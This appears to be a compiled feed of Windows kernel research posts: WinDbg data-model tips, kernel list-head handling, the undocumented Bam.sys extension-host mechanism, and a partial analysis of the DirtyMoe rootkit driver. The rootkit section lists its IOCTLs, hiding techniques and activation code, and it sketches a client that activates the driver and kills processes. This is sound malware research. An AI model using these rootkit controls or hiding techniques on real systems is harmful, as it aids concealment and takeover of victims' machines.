CI!CiValidateImageHeader read this global variable when validating an image header. In this specific case, reads of this variable happen very often; writes into it are the more interesting event, since a write can indicate an attempt to tamper with signature validation.

An interesting thing to notice about these commands is that they don't just set a breakpoint, they actually return it as an object we can control, which has attributes like IsEnabled, Condition (allowing us to set a condition), PassCount (telling us how many times this breakpoint has been hit) and more.

FileSystem

Under Debugger.Utility we have the FileSystem module, letting us query and control the file system on the host machine (not the machine we are debugging) from within the debugger:

dx -r1 Debugger.Utility.FileSystem
Debugger.Utility.FileSystem
CreateFile       [CreateFile(path, [disposition]) - Creates a file at the specified path and returns a file object.  'disposition' can be one of 'CreateAlways' or 'CreateNew']
CreateTempFile   [CreateTempFile() - Creates a temporary file in the %TEMP% folder and returns a file object]
CreateTextReader [CreateTextReader(file | path, [encoding]) - Creates a text reader over the specified file.  If a path is passed instead of a file, a file is opened at the specified path.  'encoding' can be 'Utf16', 'Utf8', or 'Ascii'.  'Ascii' is the default]
CreateTextWriter [CreateTextWriter(file | path, [encoding]) - Creates a text writer over the specified file.  If a path is passed instead of a file, a file is created at the specified path.  'encoding' can be 'Utf16', 'Utf8', or 'Ascii'.  'Ascii' is the default]
CurrentDirectory : C:\WINDOWS\system32
DeleteFile       [DeleteFile(path) - Deletes a file at the specified path]
FileExists       [FileExists(path) - Checks for the existance of a file at the specified path]
OpenFile         [OpenFile(path) - Opens a file read/write at the specified path]
TempDirectory    : C:\Users\yshafir\AppData\Local\Temp

We can create files, open them, write into them, delete them or check if a file exists in a certain path. To see a simple example, let’s dump the contents of our current directory — C:\Windows\System32:

dx -r1 Debugger.Utility.FileSystem.CurrentDirectory.Files
Debugger.Utility.FileSystem.CurrentDirectory.Files                
[0x0] : C:\WINDOWS\system32\07409496-a423-4a3e-b620-2cfb01a9318d_HyperV-ComputeNetwork.dll
[0x1] : C:\WINDOWS\system32\1
[0x2] : C:\WINDOWS\system32\103
[0x3] : C:\WINDOWS\system32\108
[0x4] : C:\WINDOWS\system32\11
[0x5] : C:\WINDOWS\system32\113
...
[0x44] : C:\WINDOWS\system32\93
[0x45] : C:\WINDOWS\system32\98
[0x46] : C:\WINDOWS\system32\@AppHelpToast.png
[0x47] : C:\WINDOWS\system32\@AudioToastIcon.png
[0x48] : C:\WINDOWS\system32\@BackgroundAccessToastIcon.png
[0x49] : C:\WINDOWS\system32\@bitlockertoastimage.png
[0x4a] : C:\WINDOWS\system32\@edptoastimage.png
[0x4b] : C:\WINDOWS\system32\@EnrollmentToastIcon.png
[0x4c] : C:\WINDOWS\system32\@language_notification_icon.png
[0x4d] : C:\WINDOWS\system32\@optionalfeatures.png
[0x4e] : C:\WINDOWS\system32\@VpnToastIcon.png
[0x4f] : C:\WINDOWS\system32\@WiFiNotificationIcon.png
[0x50] : C:\WINDOWS\system32\@windows-hello-V4.1.gif
[0x51] : C:\WINDOWS\system32\@WindowsHelloFaceToastIcon.png
[0x52] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.contrast-black.png
[0x53] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.contrast-white.png
[0x54] : C:\WINDOWS\system32\@WindowsUpdateToastIcon.png
[0x55] : C:\WINDOWS\system32\@WirelessDisplayToast.png
[0x56] : C:\WINDOWS\system32\@WwanNotificationIcon.png
[0x57] : C:\WINDOWS\system32\@WwanSimLockIcon.png
[0x58] : C:\WINDOWS\system32\aadauthhelper.dll
[0x59] : C:\WINDOWS\system32\aadcloudap.dll
[0x5a] : C:\WINDOWS\system32\aadjcsp.dll
[0x5b] : C:\WINDOWS\system32\aadtb.dll
[0x5c] : C:\WINDOWS\system32\aadWamExtension.dll
[0x5d] : C:\WINDOWS\system32\AboutSettingsHandlers.dll
[0x5e] : C:\WINDOWS\system32\AboveLockAppHost.dll
[0x5f] : C:\WINDOWS\system32\accessibilitycpl.dll
[0x60] : C:\WINDOWS\system32\accountaccessor.dll
[0x61] : C:\WINDOWS\system32\AccountsRt.dll
[0x62] : C:\WINDOWS\system32\AcGenral.dll
...

We can choose to delete one of these files:

dx -r1 Debugger.Utility.FileSystem.CurrentDirectory.Files[1].Delete()

Or delete it through DeleteFile:

dx Debugger.Utility.FileSystem.DeleteFile("C:\\WINDOWS\\system32\\71")

Notice that in this module paths must use double backslashes ("\\"), as they would if we called the Win32 API ourselves.

As a last exercise we'll put together a few of the things we learned here — we're going to create a breakpoint on a kernel variable, get the symbol that accessed it from the stack, and write that symbol into a file on our host machine.

Let’s break it down into steps:

  • Open a file to write the results to.
  • Create a text writer, which we will use to write into the file.
  • Create a breakpoint for access into a variable. In this case we’ll choose nt!PsInitialSystemProcess and set a breakpoint for read access. We will use the old MASM syntax to run a dx command every time the breakpoint is hit and move on: ba r4 <address> "dx <command>; g"
    Our command will use @$curstack to get the address that accessed the variable, and then use the @$getsym helper function we wrote earlier to find the symbol for it. We’ll use our text writer to write the result into the file.
  • Finally, we will close the file.

Putting it all together:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x"))[0])
dx @$tmpFile = Debugger.Utility.FileSystem.TempDirectory.OpenFile("log.txt")
dx @$txtWriter = Debugger.Utility.FileSystem.CreateTextWriter(@$tmpFile)
ba r4 nt!PsInitialSystemProcess "dx @$txtWriter.WriteLine(@$getsym(@$curstack.Frames[0].Attributes.InstructionOffset)); g"

We let the machine run for as long as we want, and when we want to stop the logging we can disable or clear the breakpoint and close the file with dx @$tmpFile.Close().

Now we can open our @$tmpFile and look at the results:

That's it! What an amazingly easy way to log information from the debugger!

So that's the end of our WinDbg series! All the scripts in this series will be uploaded to a GitHub repo, as well as some new ones not included here. I suggest you investigate this data model further, because we didn't even cover all the different methods it contains. Write cool tools of your own and share them with the world :)

And as long as this guide is, it still doesn't cover all the possible options in the new data model. And I didn't even mention the new support for JavaScript! You can get more information about using JavaScript in WinDbg and the new and exciting support for TTD (time travel debugging) in this excellent post.

Adventures in avoiding (list) head

Working with lists is hard. I can never get them right the first time and keep finding myself having to draw them to understand how they work, or forget to advance them in a list and get stuck in a loop. Every single time. Can you believe someone is actually paying me to write code? That runs in the kernel?

Anyway, I worked a lot with lists recently in a few projects that I might publish some day when I find the inner motivation to finish them. And I had the same problem in a few of them — I didn't start iterating over the list from its head, but from a random item, without knowing where my list head was. And knowing where the list head is can be important.

Take this example — we want to parse the kernel process list and want to get the value of Process->DiskCounters->BytesRead for each process:
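
The original post shows the loop as a screenshot; the following is only a minimal sketch of what such a naive loop might look like, assuming a reverse-engineered partial EPROCESS layout (called MY_EPROCESS here) that exposes ActiveProcessLinks, ImageFileName and DiskCounters, none of which are in the public headers, and assuming startProcess is an arbitrary process we already hold a pointer to:

PLIST_ENTRY head = &startProcess->ActiveProcessLinks;
PLIST_ENTRY entry = head;
do
{
    // Naive: every entry, including the list head, is treated as a process.
    PMY_EPROCESS process = CONTAINING_RECORD(entry, MY_EPROCESS, ActiveProcessLinks);
    DbgPrint("%s read %I64u bytes\n",
             (PCSTR)process->ImageFileName,
             process->DiskCounters->BytesRead);
    entry = entry->Flink;
} while (entry != head);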

This should work fine for any normal process:

But what will happen when we reach the list head?

The list head is not a part of a real EPROCESS structure and it is surrounded by other, unrelated variables. If we try to treat it like a normal EPROCESS we will read these and might try to use them as pointers and dereference them, which will crash sooner or later.

But a useful thing to remember is that there is one significant difference between the list head and the rest of the list — lists connect data structures that are allocated in the pool, while the list head will be a global variable in the driver that manages the list (in our example, ntoskrnl.exe has nt!PsActiveProcessHead as a global variable, used to access the process list).

There is no easy way that I know of to check if an address is in the pool or not, but we can use a trick and call RtlPcToFileHeader. This function receives an address and writes the base address of the image it’s in into an output parameter. So we can do:
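
A minimal sketch of that check, continuing the hypothetical loop above (the original shows it as an image). RtlPcToFileHeader returns the base of the loaded image containing an address and writes it to the output parameter; pool allocations are never inside an image, so getting a non-NULL base back suggests we reached the global list head:

PVOID imageBase = NULL;
RtlPcToFileHeader((PVOID)entry, &imageBase);
if (imageBase != NULL)
{
    // The entry lives inside a loaded image -> this is the list head, not a real process.
    break;
}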

We can also verify that the list head is inside the image it’s supposed to be in, by getting the image base address from a known symbol and comparing:
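
A hypothetical continuation of the same sketch: take a known ntoskrnl export, ask which image it lives in, and compare that base with the one we got for the suspected head:

PVOID ntosBase = NULL;
RtlPcToFileHeader((PVOID)PsGetCurrentProcessId, &ntosBase);
if (imageBase == ntosBase)
{
    // The suspected head is inside ntoskrnl, as expected for nt!PsActiveProcessHead.
}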

Windows RS3 added the useful RtlPcToFileName function, that makes our code a bit prettier:

Yes, More Callbacks — The Kernel Extension Mechanism


Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example "!wdbgark.wa_systemcb /type process" in WinDbg, we'll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);
typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.
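
Based on these points, a rough pseudo-C sketch of the flow might look like the following. This is only an approximation (the actual pseudo-code is in appendix B); PHOST_LIST_ENTRY refers to the host structure described below, and locking/rundown-protection details are omitted:

NTSTATUS ExRegisterExtension(PEX_EXTENSION *Extension, ULONG RegistrationVersion, PVOID RegistrationInfo)
{
    PEX_EXTENSION_REGISTRATION_1 reg = (PEX_EXTENSION_REGISTRATION_1)RegistrationInfo;

    // 1. Find a pre-registered host matching the id/version pair.
    PHOST_LIST_ENTRY host = ExpFindHost(reg->ExtensionId, reg->ExtensionVersion);
    if (host == NULL)
        return STATUS_NOT_FOUND;

    // 2. The supplied table must have the expected size and the host must not
    //    already have a registered extension.
    if (reg->FunctionCount != host->FunctionCount || host->FunctionTable != NULL)
        return STATUS_INVALID_PARAMETER;

    // 3 + 4. Wire up both directions of the "communication port".
    host->FunctionTable = reg->FunctionTable;       // driver's callbacks, called by NTOS
    if (reg->HostInterface != NULL)
        *reg->HostInterface = host->HostInterface;  // unexported nt functions for the driver

    // 5. Return the initialized host to the caller.
    *Extension = (PEX_EXTENSION)host;
    return STATUS_SUCCESS;
}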

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;   // number of callbacks that the extension contains
    POOL_TYPE PoolType;     // where this host is allocated
    PVOID HostInterface;    // table of unexported nt functions, to be used by the
                            // driver to which this extension belongs
    PVOID FunctionAddress;  // optional, rarely used. This callback is called before
                            // and after an extension for this host is registered / unregistered
    PVOID ArgForFunction;   // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that the driver "registers"
    DWORD Flags;            // Only uses one bit. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS on certain occasions, which makes them a kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension's functionality is to set RegistrationInfo->HostInterface (which points to a global variable in the calling driver) to point to some data found in the host structure. Let's get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys "knows" in advance that it should receive a table of 5 functions. These functions must be laid out in the exact order presented here, since they are called according to their index. We can see this in the case where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:
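
For illustration only, the registration call made by bam!BampRegisterKernelExtension presumably looks roughly like this; every identifier except ExRegisterExtension and the structure fields, as well as the version value, is an assumption made for the sketch:

EX_EXTENSION_REGISTRATION_1 registration = { 0 };
registration.ExtensionId      = BAM_EXTENSION_ID;        // id NTOS pre-registered for Bam
registration.ExtensionVersion = BAM_EXTENSION_VERSION;
registration.FunctionCount    = 5;                        // entries in BampKernelCalloutTable
registration.FunctionTable    = BampKernelCalloutTable;   // [0] = BampCreateProcessCallback, ...
registration.HostInterface    = &BampSystemInterface;     // global that receives nt's function table
registration.DriverObject     = DriverObject;

Status = ExRegisterExtension(&BampExtension, 1, &registration);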

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :)

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;   // number of callbacks that the extension contains
    POOL_TYPE PoolType;     // where this host is allocated
    PVOID HostInterface;    // table of unexported nt functions, to be used by the
                            // driver to which this extension belongs
    PVOID FunctionAddress;  // optional, rarely used. This callback is called before
                            // and after an extension for this host is registered / unregistered
    PVOID ArgForFunction;   // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that the driver "registers"
    DWORD Flags;            // Only uses one flag. Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Yes, More Callbacks — The Kernel Extension Mechanism was originally published in Yarden_Shafir on Medium.

DirtyMoe: Rootkit Driver

11 August 2021 at 09:44

Abstract

In the first post, DirtyMoe: Introduction and General Overview of Modularized Malware, we described a complex and sophisticated piece of malware called DirtyMoe. The malware's main observed roles are cryptojacking and DDoS attacks, both of which remain popular. There is no doubt that the malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems: the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses the Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most common techniques for hiding malicious activity is the use of rootkits. In general, the main goal of a rootkit is to hide itself and other modules of the hosted malware at the kernel layer. Rootkits are potent tools but carry a high risk of being detected, because they work in kernel mode and each critical bug leads to a BSoD.

The primary aim of this article is to analyze the rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of the DirtyMoe driver, aiming to provide comprehensive information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities in both kernel and user mode. Moreover, the driver can execute commands received from user mode with kernel privileges. Another significant aspect of the driver is the injection of an arbitrary DLL file into targeted processes. Last but not least is the driver's ability to censor the file system content. In the same way, we describe the refined routine that deploys the driver into the kernel and the anti-forensic methods the malware authors used.

Another essential point of this research is the investigation of the driver's metadata, which shows that the driver is code-signed with certificates that were stolen and revoked in the past. However, these certificates are widespread in the wild and are still being misused by other malicious software today.

Finally, the last part summarizes the rootkit functionality and draws together the key findings about the digital certificates, making a link between DirtyMoe and other malicious software. In addition, we discuss the implementation level and the sources of the rootkit techniques used.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a Windows driver that DirtyMoe drops on system startup.

Note: On VirusTotal, 44 of 71 AV engines (62%) detect the sample as malicious. On the other hand, the DirtyMoe DLL file is detected by 86% of registered AVs. Therefore, the detection coverage is sufficient since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries, FltMgr and ntoskrnl. Table 1 summarizes the most suspicious methods from the driver's point of view.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID of the process that requested a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey
ZwSetValueKey
ZwQueryValueKey
ZwOpenKey
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routines via MmGetSystemRoutineAddress() as a form of obfuscation, since the string table contains routine names operating with virtual memory; e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel routine ZwQueryInformationProcess() and strings such as services.exe and winlogon.exe point out that the rootkit probably works with kernel structures of critical Windows processes.

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities. However, it provides a wide scale of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in the user-mode.

The driver can perform actions that normally require high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The user-mode malware just sends a defined control code and data to the driver, and the driver performs the higher-privilege action.

Further, the malware can use the driver to hide some records helping to mask malicious activities. The driver affects the system registry, and can conceal arbitrary keys. Moreover, the system process services.exe is patched in its memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which driver is visible or not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a mechanism of the minifilter. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is a hook method that provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by the kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after the driver is loaded. The driver initializes a large number of global variables for its proper operation. Firstly, the driver detects the OS version and sets up the required offsets for further malicious use. Secondly, the variable pointing to the driver image is initialized. The driver image is used for hiding the driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no action of interest,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows the driver to hide files and directories.

Further, the initialization method swaps a major function IRP_MJ_CREATE for \FileSystem\Ntfs driver. So, each API call of CreateFile() or a kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.

Another Driver Entry method sets a callback method using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors a kernel process creation, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives the IRP_MJ_DEVICE_CONTROL I/O control code (IOCTL) if a user-mode thread calls Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends IRP_MJ_DEVICE_CONTROL directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and an authorization code equal to 0xB6C7C230.
0x2224C0 The malware sends data which the driver writes to the system registry. The key, value, and data type are set by the Setting control codes. Used variables: regKey, regValue, regData, regType.
0x222960 This IOCTL clears all data stored by the driver. Used variables: see the Setting and Inserting variables.
0x2227EC If the malware needs to hide a specific driver, the driver adds the driver name to listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of a registry key to the WinDeviceAddress list and hides this key using Registry Hiding. Used variable: WinDeviceAddress.
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel GetCellRoutine().
0x222004 The malware sends the ID of a process it wants to terminate. The driver calls the kernel function ZwTerminateProcess() and terminates the process and all of its threads regardless of the malware's privileges.
0x2224C8 The malware sends data which the driver writes to the file defined by the filePath variable; see the Setting control codes. Used variables: filePath, fileData.
Table 3. Controlling IOCTLs
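
To make the control flow concrete, a hypothetical user-mode client could drive the rootkit like this. The symbolic link name is a placeholder (the article does not state it), and the input buffer layouts are guesses; only the IOCTL codes and the authorization constant come from Table 3:

#include <windows.h>

int main(void)
{
    HANDLE device = CreateFileW(L"\\\\.\\PlaceholderDeviceName",   // hypothetical link name
                                GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
        return 1;

    DWORD returned = 0;

    // Activate the driver first; other IOCTLs are ignored until this succeeds.
    DWORD authCode = 0xB6C7C230;
    DeviceIoControl(device, 0x222C80, &authCode, sizeof(authCode), NULL, 0, &returned, NULL);

    // Ask the driver to terminate an arbitrary process, regardless of our own privileges.
    DWORD pid = 1234;   // example PID
    DeviceIoControl(device, 0x222004, &pid, sizeof(pid), NULL, 0, &returned, NULL);

    CloseHandle(device);
    return 0;
}
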
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
Process Image File Name WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
Process Image File Name WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names (full path) WinDeviceName, WinDeviceNameB Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and the requesting process is also whitelisted, the driver grants access to the file.
File names (full path) WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and the requesting process is also blacklisted, the driver refuses access to the file.
File names (containing a number) WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a naming convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access of these processes; see Callback of NTFS Driver.
Process ID ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system; see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system; see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values as a global variable. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
(Shutdown)
filename1_for_ShutDown
data1_for_ShutDown
Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown
data2_for_ShutDown
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
